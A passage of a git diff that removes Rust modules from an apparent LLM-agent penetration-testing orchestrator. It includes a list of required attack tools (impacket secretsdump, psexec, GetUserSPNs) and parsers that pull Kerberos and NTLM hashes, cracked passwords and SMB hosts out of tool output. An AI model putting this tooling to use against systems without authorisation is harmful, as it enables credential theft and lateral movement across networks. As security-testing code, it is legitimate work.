Redis and update the registry.
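-///
-/// Heartbeat timestamps are RFC 3339 strings; unparseable values fall back
-/// to `Utc::now()` so a malformed heartbeat never makes an agent look stale.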
-async fn run_heartbeat_sweep( - queue: &TaskQueue, - registry: &AgentRegistry, - config: &OrchestratorConfig, -) -> Result<()> { - let names = registry.agent_names().await; - for name in &names { - match queue.get_heartbeat(name).await { - Ok(Some(hb)) => { - let ts = DateTime::parse_from_rfc3339(&hb.timestamp) - .map(|dt| dt.with_timezone(&Utc)) - .unwrap_or_else(|_| Utc::now()); - registry - .update_heartbeat(name, &hb.status, hb.current_task.as_deref(), ts) - .await; - } - Ok(None) => { - debug!(agent = %name, "No heartbeat key in Redis"); - } - Err(e) => { - warn!(agent = %name, err = %e, "Failed to read heartbeat"); - } - } - } - - // Mark stale agents offline - let stale = registry.stale_agents(config.heartbeat_timeout).await; - for agent in &stale { - warn!( - agent = %agent.name, - last_hb = %agent.last_heartbeat, - "Agent heartbeat stale — marking offline" - ); - registry.mark_offline(&agent.name).await; - } - - Ok(()) -} - -/// Remove tasks that have been active longer than the configured stale timeout. -/// -/// Before removing, checks Redis for unclaimed results and logs a warning so -/// we know the result consumer missed them. (The real-time discovery push in -/// `RedisToolDispatcher` ensures discoveries still reach state.) -async fn cleanup_stale_tasks( - tracker: &ActiveTaskTracker, - queue: &TaskQueue, - config: &OrchestratorConfig, -) -> Result<()> { - let llm_count = tracker.llm_task_count().await; - let hard_cap = config.hard_cap(); - - // Use shorter timeout when at hard cap to break deadlock faster - let effective_timeout = if llm_count >= hard_cap { - config.stale_task_timeout / 2 - } else { - config.stale_task_timeout - }; - - let stale = tracker.stale_tasks(effective_timeout).await; - for task in &stale { - // Check if there's an unclaimed result sitting in Redis - let has_unclaimed = queue - .has_pending_result(&task.task_id) - .await - .unwrap_or(false); - - if has_unclaimed { - warn!( - task_id = %task.task_id, - role = %task.role, - age_secs = task.submitted_at.elapsed().as_secs(), - "Removing stale task with UNCLAIMED result in Redis (result consumer missed it)" - ); - } else { - warn!( - task_id = %task.task_id, - role = %task.role, - age_secs = task.submitted_at.elapsed().as_secs(), - "Removing stale task" - ); - } - tracker.remove(&task.task_id).await; - } - - if !stale.is_empty() { - info!( - removed = stale.len(), - llm_count, hard_cap, "Stale task cleanup complete" - ); - } - - Ok(()) -} - -// --------------------------------------------------------------------------- -// Pre-flight tool check -// --------------------------------------------------------------------------- - -/// Critical tools per worker role. If any of these are missing, operations -/// will be severely degraded. -pub(crate) const CRITICAL_TOOLS: &[(&str, &[&str])] = &[ - ("recon", &["nmap", "netexec"]), - ( - "credential_access", - &[ - "impacket-GetUserSPNs", - "impacket-GetNPUsers", - "impacket-secretsdump", - ], - ), - ("privesc", &["impacket-findDelegation", "impacket-getST"]), - ( - "lateral", - &[ - "impacket-psexec", - "impacket-smbexec", - "impacket-secretsdump", - ], - ), -]; - -/// Query Redis for each worker's tool inventory and report any missing -/// critical tools. Returns a list of (role, missing_tools) pairs. 
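-/// Inventories are JSON string arrays keyed by `ares:tools:ares-{role}-agent`
-/// (e.g. `["nmap", "netexec"]`); a missing key is treated as every critical
-/// tool for that role being absent.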
-pub(crate) async fn preflight_tool_check( - conn: &mut redis::aio::ConnectionManager, -) -> Vec<(String, Vec<String>)> { - use redis::AsyncCommands; - - let mut problems = Vec::new(); - - for &(role, critical) in CRITICAL_TOOLS { - let agent_key = format!("ares:tools:ares-{role}-agent"); - let available: Vec<String> = match conn.get::<_, Option<String>>(&agent_key).await { - Ok(Some(json)) => serde_json::from_str(&json).unwrap_or_default(), - _ => { - // No inventory published yet — worker may not have started - warn!( - role = role, - "No tool inventory found — worker may not be running" - ); - problems.push(( - role.to_string(), - critical.iter().map(|s| s.to_string()).collect(), - )); - continue; - } - }; - - let missing: Vec<String> = critical - .iter() - .filter(|&&tool| !available.iter().any(|a| a == tool)) - .map(|s| s.to_string()) - .collect(); - - if !missing.is_empty() { - problems.push((role.to_string(), missing)); - } - } - - problems -} - -#[cfg(test)] -mod tests { - use super::*; - - #[tokio::test] - async fn register_and_list() { - let r = AgentRegistry::new(); - r.register("ares-recon-0", "recon").await; - r.register("ares-lateral-0", "lateral").await; - let mut names = r.agent_names().await; - names.sort(); - assert_eq!(names, vec!["ares-lateral-0", "ares-recon-0"]); - } - - #[tokio::test] - async fn heartbeat_update_prevents_staleness() { - let r = AgentRegistry::new(); - r.register("a1", "recon").await; - r.update_heartbeat("a1", "busy", Some("task-42"), Utc::now()) - .await; - assert!(r - .stale_agents(std::time::Duration::from_secs(60)) - .await - .is_empty()); - } - - #[tokio::test] - async fn stale_agent_detected() { - let r = AgentRegistry::new(); - r.register("old", "recon").await; - let old_ts = Utc::now() - chrono::Duration::seconds(120); - r.update_heartbeat("old", "idle", None, old_ts).await; - let stale = r.stale_agents(std::time::Duration::from_secs(60)).await; - assert_eq!(stale.len(), 1); - assert_eq!(stale[0].name, "old"); - } - - #[tokio::test] - async fn mark_offline_excludes_from_stale() { - let r = AgentRegistry::new(); - r.register("dead", "recon").await; - let old_ts = Utc::now() - chrono::Duration::seconds(300); - r.update_heartbeat("dead", "idle", None, old_ts).await; - r.mark_offline("dead").await; - assert!(r - .stale_agents(std::time::Duration::from_secs(60)) - .await - .is_empty()); - } - - #[tokio::test] - async fn re_register_updates_role() { - let r = AgentRegistry::new(); - r.register("a1", "recon").await; - r.register("a1", "lateral").await; - let agents = r.agents.lock().await; - assert_eq!(agents.get("a1").unwrap().role, "lateral"); - } -} diff --git a/ares-orchestrator/src/output_extraction/hashes.rs b/ares-orchestrator/src/output_extraction/hashes.rs deleted file mode 100644 index 11ac84ea..00000000 --- a/ares-orchestrator/src/output_extraction/hashes.rs +++ /dev/null @@ -1,308 +0,0 @@ -use regex::Regex; -use std::sync::LazyLock; - -use ares_core::models::{Credential, Hash}; - -use super::{is_valid_credential, make_credential}; - -static RE_TGS_HASH: LazyLock<Regex> = LazyLock::new(|| { - Regex::new(r"(\$krb5tgs\$\d+\$\*([^$*]+)\$([^$*]+)\$[^$]+\$[a-fA-F0-9$]+)").unwrap() -}); - -static RE_ASREP_HASH: LazyLock<Regex> = - LazyLock::new(|| Regex::new(r"(\$krb5asrep\$\d+\$([^@:]+)@([^:]+):[a-fA-F0-9$]+)").unwrap()); - -// domain\user:rid:lmhash:nthash::: -static RE_NTLM_DOMAIN: LazyLock<Regex> = LazyLock::new(|| { - Regex::new(r"([^\\:\s]+)\\([^:\\]+):\d+:([a-fA-F0-9]{32}):([a-fA-F0-9]{32}):::").unwrap() -}); - -// user:rid:lmhash:nthash::: -static RE_NTLM_PLAIN: LazyLock<Regex> =
LazyLock::new(|| { - Regex::new(r"^([^:\\$\s]+):(\d+):([a-fA-F0-9]{32}):([a-fA-F0-9]{32}):::").unwrap() -}); - -// Partial NTLM line (line-wrapped secretsdump) -static RE_NTLM_PARTIAL: LazyLock<Regex> = - LazyLock::new(|| Regex::new(r"^[^:\s]+:\d+:[a-fA-F0-9]{32}:[a-fA-F0-9]+$").unwrap()); - -static RE_NTLM_CONTINUATION: LazyLock<Regex> = - LazyLock::new(|| Regex::new(r"^[a-fA-F0-9]+:::$").unwrap()); - -pub fn extract_hashes(output: &str, default_domain: &str) -> Vec<Hash> { - let mut hashes = Vec::new(); - let mut seen = std::collections::HashSet::new(); - - // First pass: unwrap line-wrapped NTLM hashes - let lines: Vec<&str> = output.lines().collect(); - let mut unwrapped: Vec<String> = Vec::new(); - let mut i = 0; - while i < lines.len() { - let line = lines[i].trim(); - if RE_NTLM_PARTIAL.is_match(line) && i + 1 < lines.len() { - let next = lines[i + 1].trim(); - if RE_NTLM_CONTINUATION.is_match(next) { - unwrapped.push(format!("{}{}", line, next)); - i += 2; - continue; - } - } - unwrapped.push(line.to_string()); - i += 1; - } - - for line in &unwrapped { - // Priority: TGS → AS-REP → NTLM (first match wins) - - // TGS (Kerberoast) - if let Some(caps) = RE_TGS_HASH.captures(line) { - let hash_value = caps.get(1).unwrap().as_str(); - let username = caps.get(2).unwrap().as_str(); - let domain = caps.get(3).unwrap().as_str(); - let key = format!("tgs:{}@{}", username.to_lowercase(), domain.to_lowercase()); - if seen.insert(key) { - hashes.push(Hash { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - hash_value: hash_value.to_string(), - hash_type: "kerberoast".to_string(), - domain: domain.to_string(), - cracked_password: None, - source: "output_extraction".to_string(), - discovered_at: Some(chrono::Utc::now()), - parent_id: None, - attack_step: 0, - aes_key: None, - }); - } - continue; - } - - // AS-REP - if let Some(caps) = RE_ASREP_HASH.captures(line) { - let hash_value = caps.get(1).unwrap().as_str(); - let username = caps.get(2).unwrap().as_str(); - let domain = caps.get(3).unwrap().as_str(); - let key = format!( - "asrep:{}@{}", - username.to_lowercase(), - domain.to_lowercase() - ); - if seen.insert(key) { - hashes.push(Hash { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - hash_value: hash_value.to_string(), - hash_type: "asrep".to_string(), - domain: domain.to_string(), - cracked_password: None, - source: "output_extraction".to_string(), - discovered_at: Some(chrono::Utc::now()), - parent_id: None, - attack_step: 0, - aes_key: None, - }); - } - continue; - } - - // NTLM with domain prefix - if let Some(caps) = RE_NTLM_DOMAIN.captures(line) { - let domain = caps.get(1).unwrap().as_str(); - let username = caps.get(2).unwrap().as_str(); - let lm = caps.get(3).unwrap().as_str(); - let nt = caps.get(4).unwrap().as_str(); - let hash_value = format!("{lm}:{nt}"); - let key = format!("ntlm:{}@{}", username.to_lowercase(), domain.to_lowercase()); - if seen.insert(key) { - hashes.push(Hash { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - hash_value, - hash_type: "ntlm".to_string(), - domain: domain.to_string(), - cracked_password: None, - source: "output_extraction".to_string(), - discovered_at: Some(chrono::Utc::now()), - parent_id: None, - attack_step: 0, - aes_key: None, - }); - } - continue; - } - - // NTLM without domain prefix - if let Some(caps) = RE_NTLM_PLAIN.captures(line) { - let username = caps.get(1).unwrap().as_str(); - let lm = caps.get(3).unwrap().as_str(); - let nt = caps.get(4).unwrap().as_str(); - let hash_value =
format!("{lm}:{nt}"); - let key = format!( - "ntlm:{}@{}", - username.to_lowercase(), - default_domain.to_lowercase() - ); - if seen.insert(key) { - hashes.push(Hash { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - hash_value, - hash_type: "ntlm".to_string(), - domain: default_domain.to_string(), - cracked_password: None, - source: "output_extraction".to_string(), - discovered_at: Some(chrono::Utc::now()), - parent_id: None, - attack_step: 0, - aes_key: None, - }); - } - } - } - - hashes -} - -/// Hashcat cracked TGS: $krb5tgs$23$*user$DOMAIN$spn*$hash:plaintext -static RE_CRACKED_TGS: LazyLock<Regex> = LazyLock::new(|| { - Regex::new(r"\$krb5tgs\$\d+\$\*([^$*]+)\$([^$*]+)\$[^*]+\*\$[a-fA-F0-9$]+:(.+)$").unwrap() -}); - -/// Cracked AS-REP: $krb5asrep$23$user@DOMAIN:hash:plaintext (hashcat) -/// or $krb5asrep$23$user@DOMAIN:plaintext (john --show, no hex section) -static RE_CRACKED_ASREP: LazyLock<Regex> = LazyLock::new(|| { - Regex::new(r"\$krb5asrep\$\d+\$([^@:]+)@([^:]+):(?:[a-fA-F0-9$]+:)?(.+)$").unwrap() -}); - -/// John --show output: user:plaintext (with optional trailing :::... fields) -/// Only matches lines that look like john --show format — username followed by -/// password, then optional RID and empty LM/NT fields. -static RE_JOHN_SHOW: LazyLock<Regex> = LazyLock::new(|| { - Regex::new(r"^([^:\s$][^:]*):([^:]+):\d*:(?:[a-fA-F0-9]*:){0,3}:*\s*$").unwrap() -}); - -/// John --show unknown user: ?:plaintext (john can't determine username from TGS hashes) -static RE_JOHN_UNKNOWN_USER: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"^\?:(.+)$").unwrap()); - -/// Extract username/domain from a TGS hash in the output text. -static RE_TGS_HASH_USER: LazyLock<Regex> = - LazyLock::new(|| Regex::new(r"\$krb5tgs\$\d+\$\*([^$*]+)\$([^$*]+)").unwrap()); - -pub fn extract_cracked_passwords(output: &str, default_domain: &str) -> Vec<Credential> { - let mut credentials = Vec::new(); - let mut seen = std::collections::HashSet::new(); - - // Detect john --show context (john outputs "N password hash cracked") - let is_john_output = - output.contains("password hash cracked") || output.contains("password hashes cracked"); - - for line in output.lines() { - let stripped = line.trim(); - if stripped.is_empty() { - continue; - } - - // Hashcat cracked TGS (Kerberoast) - if let Some(caps) = RE_CRACKED_TGS.captures(stripped) { - let username = caps.get(1).unwrap().as_str(); - let domain = caps.get(2).unwrap().as_str(); - let password = caps.get(3).unwrap().as_str(); - if is_valid_credential(username, password) { - let key = format!( - "cracked:{}@{}", - username.to_lowercase(), - domain.to_lowercase() - ); - if seen.insert(key) { - credentials.push(make_credential( - username, - password, - domain, - "cracked:hashcat", - )); - } - } - continue; - } - - // Hashcat cracked AS-REP - if let Some(caps) = RE_CRACKED_ASREP.captures(stripped) { - let username = caps.get(1).unwrap().as_str(); - let domain = caps.get(2).unwrap().as_str(); - let password = caps.get(3).unwrap().as_str(); - if is_valid_credential(username, password) { - let key = format!( - "cracked:{}@{}", - username.to_lowercase(), - domain.to_lowercase() - ); - if seen.insert(key) { - credentials.push(make_credential( - username, - password, - domain, - "cracked:hashcat", - )); - } - } - continue; - } - - // John --show output (only if we detected john context) - if is_john_output { - // John --show unknown user: ?:password (TGS hashes) - // Try to extract username from a $krb5tgs$ line in the same output.
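- // Illustrative (made-up values): john prints `?:Summer2018!` while the
- // hash line embeds `$krb5tgs$23$*svc_web$CONTOSO.LOCAL$...`, so the
- // username and domain are recovered from the latter.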
- if let Some(caps) = RE_JOHN_UNKNOWN_USER.captures(stripped) { - let password = caps.get(1).unwrap().as_str().trim(); - if is_valid_credential("?", password) { - // Scan output for a TGS hash line to get username/domain - if let Some(tgs_caps) = RE_TGS_HASH_USER.captures(output) { - let username = tgs_caps.get(1).unwrap().as_str(); - let domain = tgs_caps.get(2).unwrap().as_str(); - let key = format!( - "cracked:{}@{}", - username.to_lowercase(), - domain.to_lowercase() - ); - if seen.insert(key) { - credentials.push(make_credential( - username, - password, - domain, - "cracked:john", - )); - } - } - } - continue; - } - - if let Some(caps) = RE_JOHN_SHOW.captures(stripped) { - let username = caps.get(1).unwrap().as_str(); - let password = caps.get(2).unwrap().as_str(); - // Skip john summary lines - if username.chars().all(|c| c.is_ascii_digit()) { - continue; - } - if is_valid_credential(username, password) { - let key = format!( - "cracked:{}@{}", - username.to_lowercase(), - default_domain.to_lowercase() - ); - if seen.insert(key) { - credentials.push(make_credential( - username, - password, - default_domain, - "cracked:john", - )); - } - } - } - } - } - - credentials -} diff --git a/ares-orchestrator/src/output_extraction/hosts.rs b/ares-orchestrator/src/output_extraction/hosts.rs deleted file mode 100644 index b8cb463d..00000000 --- a/ares-orchestrator/src/output_extraction/hosts.rs +++ /dev/null @@ -1,108 +0,0 @@ -use regex::Regex; -use std::sync::LazyLock; - -use ares_core::models::Host; - -static RE_SMB_BANNER: LazyLock = LazyLock::new(|| { - Regex::new(r"SMB\s+(\d{1,3}(?:\.\d{1,3}){3})\s+\d+\s+([A-Za-z0-9_.\-]+)\s+\[\*\]\s+(.+)") - .unwrap() -}); - -static RE_SMB_BANNER_NAME: LazyLock = - LazyLock::new(|| Regex::new(r"\(name:([^)]+)\)").unwrap()); - -static RE_SMB_BANNER_DOMAIN: LazyLock = - LazyLock::new(|| Regex::new(r"\(domain:([^)]+)\)").unwrap()); - -static RE_SMB_BANNER_OS: LazyLock = - LazyLock::new(|| Regex::new(r"^\s*([^(]+?)\s+\(name:").unwrap()); - -static RE_SMB_SIMPLE: LazyLock = LazyLock::new(|| { - Regex::new(r"^SMB\s+(\d{1,3}(?:\.\d{1,3}){3})\s+\d+\s+([A-Za-z0-9_\-]+)\s+").unwrap() -}); - -pub fn extract_hosts(output: &str) -> Vec { - let mut hosts = Vec::new(); - let mut seen = std::collections::HashSet::new(); - - for line in output.lines() { - let stripped = line.trim(); - - // Banner line with OS info: SMB IP PORT HOST [*] details - if let Some(caps) = RE_SMB_BANNER.captures(stripped) { - let ip = caps.get(1).unwrap().as_str().to_string(); - if !seen.insert(ip.clone()) { - continue; - } - let details = caps.get(3).unwrap().as_str(); - let netbios_name = RE_SMB_BANNER_NAME - .captures(details) - .map(|c| c.get(1).unwrap().as_str().to_string()) - .unwrap_or_default(); - let domain = RE_SMB_BANNER_DOMAIN - .captures(details) - .map(|c| { - // netexec appends trailing artifacts like "0." 
— strip them
-                    c.get(1)
-                        .unwrap()
-                        .as_str()
-                        .trim_end_matches("0.")
-                        .trim_end_matches('.')
-                        .to_string()
-                })
-                .unwrap_or_default();
-            let os = RE_SMB_BANNER_OS
-                .captures(details)
-                .map(|c| c.get(1).unwrap().as_str().trim().to_string())
-                .unwrap_or_default();
-
-            let hostname =
-                if !netbios_name.is_empty() && !domain.is_empty() && !netbios_name.contains('.') {
-                    format!("{}.{}", netbios_name.to_lowercase(), domain.to_lowercase())
-                } else {
-                    netbios_name
-                };
-
-            let is_dc = details.contains("(signing:True)");
-            let mut roles = Vec::new();
-            if is_dc {
-                roles.push("AD DC".to_string());
-            }
-
-            hosts.push(Host {
-                ip,
-                hostname,
-                os,
-                roles,
-                services: vec![],
-                is_dc,
-                owned: false,
-            });
-            continue;
-        }
-
-        // Fallback simple line
-        if let Some(caps) = RE_SMB_SIMPLE.captures(stripped) {
-            let ip = caps.get(1).unwrap().as_str().to_string();
-            let host_col = caps.get(2).unwrap().as_str();
-            // Skip table header words
-            let skip = ["share", "name", "permissions", "remark"];
-            if skip.contains(&host_col.to_lowercase().as_str()) {
-                continue;
-            }
-            if seen.insert(ip.clone()) {
-                hosts.push(Host {
-                    ip,
-                    hostname: host_col.to_string(),
-                    os: String::new(),
-                    roles: vec![],
-                    services: vec![],
-                    is_dc: false,
-                    owned: false,
-                });
-            }
-        }
-    }
-
-    hosts
-}
diff --git a/ares-orchestrator/src/output_extraction/mod.rs b/ares-orchestrator/src/output_extraction/mod.rs
deleted file mode 100644
index e428dcf2..00000000
--- a/ares-orchestrator/src/output_extraction/mod.rs
+++ /dev/null
@@ -1,160 +0,0 @@
-//! Regex-based extraction of discoveries from raw tool output text.
-//!
-//! This is the orchestrator-level safety net that mirrors Python's
-//! `_process_output_text()` in `result_processing.py`. It parses raw
-//! text from task results to catch credentials, hashes, hosts, shares,
-//! and users that the per-tool parsers or LLM may have missed.
-//!
-//! The per-tool parsers in `ares_tools::parsers` are the primary extraction
-//! mechanism (they run at tool-call time). This module runs on the full task
-//! result text as a secondary pass.
-
-mod hashes;
-mod hosts;
-mod passwords;
-mod shares;
-#[cfg(test)]
-mod tests;
-mod users;
-
-use regex::Regex;
-use std::sync::LazyLock;
-
-use ares_core::models::{Credential, Hash, Host, Share, User};
-
-pub use hashes::{extract_cracked_passwords, extract_hashes};
-pub use hosts::extract_hosts;
-pub use passwords::extract_plaintext_passwords;
-pub use shares::extract_shares;
-pub use users::extract_users;
-
-/// Strip ANSI escape sequences from text (e.g., color codes from tool output).
-pub(crate) fn strip_ansi(s: &str) -> String {
-    static RE: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"\x1b\[[0-9;]*m").unwrap());
-    RE.replace_all(s, "").into_owned()
-}
-
-/// All discoveries extracted from raw output text.
-#[derive(Debug, Default)]
-pub struct TextExtractions {
-    pub credentials: Vec<Credential>,
-    pub hashes: Vec<Hash>,
-    pub hosts: Vec<Host>,
-    pub users: Vec<User>,
-    pub shares: Vec<Share>,
-}
-
-impl TextExtractions {
-    pub fn is_empty(&self) -> bool {
-        self.credentials.is_empty()
-            && self.hashes.is_empty()
-            && self.hosts.is_empty()
-            && self.users.is_empty()
-            && self.shares.is_empty()
-    }
-}
-
-/// Extract all discoverable entities from raw output text.
-///
-/// Runs all extraction passes and returns the combined results.
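strip_ansi above is the usual one-regex approach to de-colorizing tool output before any extraction pass runs. A standalone demonstration, assuming the regex crate; the colored sample line is invented:

```rust
use regex::Regex;

fn strip_ansi(s: &str) -> String {
    // SGR color/style sequences look like ESC [ <params> m.
    let re = Regex::new(r"\x1b\[[0-9;]*m").unwrap();
    re.replace_all(s, "").into_owned()
}

fn main() {
    let colored = "\x1b[1;32m[+]\x1b[0m contoso.local\\jdoe:Winter2025!";
    assert_eq!(strip_ansi(colored), "[+] contoso.local\\jdoe:Winter2025!");
}
```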
-pub fn extract_from_output_text(output: &str, default_domain: &str) -> TextExtractions { - let mut result = TextExtractions::default(); - if output.is_empty() { - return result; - } - - result.hosts = extract_hosts(output); - result.users = extract_users(output, default_domain); - result.credentials = extract_plaintext_passwords(output, default_domain); - result.shares = extract_shares(output); - result.hashes = extract_hashes(output, default_domain); - - let cracked = extract_cracked_passwords(output, default_domain); - result.credentials.extend(cracked); - - result -} - -/// Validate a credential pair — matches Python's add_credential() rejection checks. -pub(crate) fn is_valid_credential(username: &str, password: &str) -> bool { - if username.is_empty() || password.is_empty() { - return false; - } - if username.contains('/') || username.contains('\\') || username.ends_with(".txt") { - return false; - } - if password.contains('/') || password.contains('\\') || password.ends_with(".txt") { - return false; - } - let user_lower = username.to_lowercase(); - if matches!(user_lower.as_str(), "(none)" | "none" | "null" | "(null)") { - return false; - } - let user_upper = username.to_uppercase(); - if user_upper.starts_with("EVIL") && user_upper.ends_with('$') { - let middle = &user_upper[4..user_upper.len() - 1]; - if middle.chars().all(|c| c.is_ascii_digit()) { - return false; - } - } - let pw_lower = password.to_lowercase(); - if matches!( - pw_lower.as_str(), - "(null)" - | "(null:null)" - | "*blank*" - | "" - | "n/a" - | "[+]" - | "[-]" - | "password" - | "no" - | "yes" - | "true" - | "false" - | "unknown" - | "none" - | "null" - | "fail" - | "failed" - | "error" - | "status" - | "success" - | "enabled" - | "disabled" - | "required" - | "allowed" - | "denied" - ) { - return false; - } - if password.len() < 3 { - return false; - } - if password.len() > 128 { - return false; - } - if password.len() > 40 && password.chars().all(|c| c.is_ascii_hexdigit() || c == '$') { - return false; - } - true -} - -pub(crate) fn make_credential( - username: &str, - password: &str, - domain: &str, - source: &str, -) -> Credential { - Credential { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - password: password.to_string(), - domain: domain.to_string(), - source: source.to_string(), - discovered_at: Some(chrono::Utc::now()), - is_admin: false, - parent_id: None, - attack_step: 0, - } -} diff --git a/ares-orchestrator/src/output_extraction/passwords.rs b/ares-orchestrator/src/output_extraction/passwords.rs deleted file mode 100644 index 2d06a50a..00000000 --- a/ares-orchestrator/src/output_extraction/passwords.rs +++ /dev/null @@ -1,178 +0,0 @@ -use regex::Regex; -use std::sync::LazyLock; - -use ares_core::models::Credential; - -use super::users::{RE_ACCOUNT, RE_DOMAIN_BACKSLASH, RE_UPN, RE_USER_BRACKET}; -use super::{is_valid_credential, make_credential}; - -static RE_DEFAULT_PASSWORD_CRED: LazyLock = - LazyLock::new(|| Regex::new(r"^([^\\]+)\\([^:]+):(.+)$").unwrap()); - -static RE_PASSWORD_VALUE: LazyLock = - LazyLock::new(|| Regex::new(r"(?i)Password\s*:\s*([^\s)]+)").unwrap()); - -static RE_SMB_TIMESTAMP_PASSWORD: LazyLock = LazyLock::new(|| { - Regex::new( - r"SMB\s+\S+\s+\d+\s+\S+\s+([A-Za-z0-9_.\-]+)\s+\d{4}-\d{2}-\d{2}.*(?i)Password\s*:\s*", - ) - .unwrap() -}); - -/// General nxc SMB line with a username field followed eventually by "Password": -/// `SMB IP PORT HOST username ... Password : xxx` -/// Broader than RE_SMB_TIMESTAMP_PASSWORD — doesn't require a timestamp. 
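is_valid_credential above is deliberately paranoid, since tool banners, status words, file paths, and hash fragments all masquerade as passwords in raw output. A few probes against a trimmed-down version of the same checks (the full rejection list is in the diff above):

```rust
fn plausible_password(pw: &str) -> bool {
    // Trimmed-down stand-in for the removed checks: reject paths, status
    // noise, and out-of-range lengths.
    const NOISE: &[&str] = &["(null)", "password", "success", "enabled", "unknown"];
    !pw.contains('/')
        && !pw.contains('\\')
        && !pw.ends_with(".txt")
        && !NOISE.contains(&pw.to_lowercase().as_str())
        && (3..=128).contains(&pw.len())
}

fn main() {
    assert!(plausible_password("Summer2026!"));
    assert!(!plausible_password("/tmp/users.txt")); // path, not a password
    assert!(!plausible_password("SUCCESS"));        // status word
    assert!(!plausible_password("no"));             // too short to be real
}
```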
-static RE_SMB_LINE_PASSWORD: LazyLock<Regex> = LazyLock::new(|| {
-    Regex::new(r"SMB\s+\S+\s+\d+\s+\S+\s+([A-Za-z0-9_.\-]+)\s+.*(?i)Password\s*:\s*").unwrap()
-});
-
-/// Netexec [+] success line: `SMB IP PORT HOST [+] DOMAIN\user:password`
-static RE_NETEXEC_SUCCESS: LazyLock<Regex> = LazyLock::new(|| {
-    Regex::new(r"\[\+\]\s+([A-Za-z0-9_.\-]+)\\([A-Za-z0-9_.\-$]+):([^\s(]+)").unwrap()
-});
-
-pub fn extract_plaintext_passwords(output: &str, default_domain: &str) -> Vec<Credential> {
-    let mut credentials = Vec::new();
-    let mut seen = std::collections::HashSet::new();
-
-    const FAILURE_MARKERS: &[&str] = &[
-        "STATUS_LOGON_FAILURE",
-        "STATUS_PASSWORD_EXPIRED",
-        "STATUS_PASSWORD_MUST_CHANGE",
-        "STATUS_ACCOUNT_LOCKED_OUT",
-        "STATUS_ACCOUNT_DISABLED",
-        "STATUS_ACCOUNT_RESTRICTION",
-        "STATUS_NO_LOGON_SERVERS",
-        "STATUS_ACCESS_DENIED",
-        "STATUS_INVALID_LOGON_HOURS",
-        "STATUS_INVALID_WORKSTATION",
-        "LOGON FAILURE",
-        "LOGON_FAILURE",
-        "ACCESS_DENIED",
-        // Guest fallback — SMB accepted the connection but mapped it to the
-        // built-in Guest account. The supplied password was NOT validated.
-        "(GUEST)",
-    ];
-
-    for line in output.lines() {
-        let stripped = line.trim();
-        if !stripped.contains("[+]") {
-            continue;
-        }
-        let upper = stripped.to_uppercase();
-        if FAILURE_MARKERS.iter().any(|m| upper.contains(m)) {
-            continue;
-        }
-        if let Some(caps) = RE_NETEXEC_SUCCESS.captures(stripped) {
-            let domain = caps.get(1).unwrap().as_str().to_string();
-            let user = caps.get(2).unwrap().as_str().to_string();
-            let pass = caps
-                .get(3)
-                .unwrap()
-                .as_str()
-                .trim_end_matches("(Pwn3d!)")
-                .trim()
-                .to_string();
-            if is_valid_credential(&user, &pass) {
-                let key = format!("{}\\{}:{}", domain, user, pass);
-                if seen.insert(key) {
-                    credentials.push(make_credential(&user, &pass, &domain, "netexec_auth"));
-                }
-            }
-        }
-    }
-    let mut current_domain = default_domain.to_string();
-    let mut expecting_default_password = false;
-
-    let lines: Vec<&str> = output.lines().collect();
-    for line in &lines {
-        let stripped = line.trim();
-
-        // DefaultPassword block
-        if stripped.contains("[*] DefaultPassword") {
-            expecting_default_password = true;
-            continue;
-        }
-
-        if expecting_default_password {
-            expecting_default_password = false;
-            if let Some(caps) = RE_DEFAULT_PASSWORD_CRED.captures(stripped) {
-                let domain = caps.get(1).unwrap().as_str().to_string();
-                let user = caps.get(2).unwrap().as_str().to_string();
-                let pass = caps.get(3).unwrap().as_str().to_string();
-                if is_valid_credential(&user, &pass) {
-                    let key = format!("{}\\{}:{}", domain, user, pass);
-                    if seen.insert(key) {
-                        credentials.push(make_credential(
-                            &user,
-                            &pass,
-                            &domain,
-                            "autologon_registry",
-                        ));
-                    }
-                }
-                continue;
-            }
-        }
-
-        // Track current domain context (for dedup key and credential domain).
-        // Only domain is tracked — username tracking was removed to prevent
-        // stale-context misattribution (LDAP doesn't guarantee attribute order).
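The netexec pass above only trusts a `[+]` line when no failure marker, and no `(Guest)` fallback marker, appears on it, then trims the `(Pwn3d!)` suffix from the password field. A runnable sketch of that gate, assuming the regex crate (marker list abridged, log lines invented):

```rust
use regex::Regex;

fn main() {
    let re = Regex::new(r"\[\+\]\s+([A-Za-z0-9_.\-]+)\\([A-Za-z0-9_.\-$]+):([^\s(]+)").unwrap();
    const FAILURE_MARKERS: &[&str] = &["STATUS_LOGON_FAILURE", "ACCESS_DENIED", "(GUEST)"];

    let output = "\
SMB 10.0.0.5 445 DC01 [-] corp.local\\admin:admin STATUS_LOGON_FAILURE\n\
SMB 10.0.0.5 445 DC01 [+] corp.local\\guest:guest (Guest)\n\
SMB 10.0.0.5 445 DC01 [+] corp.local\\jdoe:Winter2025!";

    for line in output.lines() {
        if !line.contains("[+]") { continue; }
        let upper = line.to_uppercase();
        // A Guest fallback means SMB mapped the session to Guest; the
        // password was never validated, so the line must be discarded.
        if FAILURE_MARKERS.iter().any(|m| upper.contains(m)) { continue; }
        if let Some(c) = re.captures(line) {
            println!("valid: {}\\{} => {}", &c[1], &c[2], &c[3]);
        }
    }
    // Only corp.local\jdoe:Winter2025! survives the gate.
}
```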
- if let Some(caps) = RE_DOMAIN_BACKSLASH.captures(stripped) { - current_domain = caps.get(1).unwrap().as_str().to_string(); - } else if let Some(caps) = RE_UPN.captures(stripped) { - current_domain = caps.get(2).unwrap().as_str().to_string(); - } - - // Password extraction (only on lines containing "password") - if !stripped.to_lowercase().contains("password") { - continue; - } - - if let Some(caps) = RE_PASSWORD_VALUE.captures(stripped) { - let password = caps - .get(1) - .unwrap() - .as_str() - .trim_end_matches(|c| ".,;:()".contains(c)) - .trim_matches('\'') - .trim_matches('"') - .to_string(); - - // Extract username from the SAME line only. Never fall back to - // current_user — LDAP doesn't guarantee attribute order, so - // description may appear before sAMAccountName within an entry, - // causing stale current_user from a previous entry to be - // misattributed (e.g. john.smith:Summer2025 instead of - // sam.wilson:Summer2025). Per-tool parsers handle structured - // extraction; this safety net only catches same-line patterns. - let username = if let Some(smb_caps) = RE_SMB_TIMESTAMP_PASSWORD.captures(stripped) { - smb_caps.get(1).unwrap().as_str().to_string() - } else if let 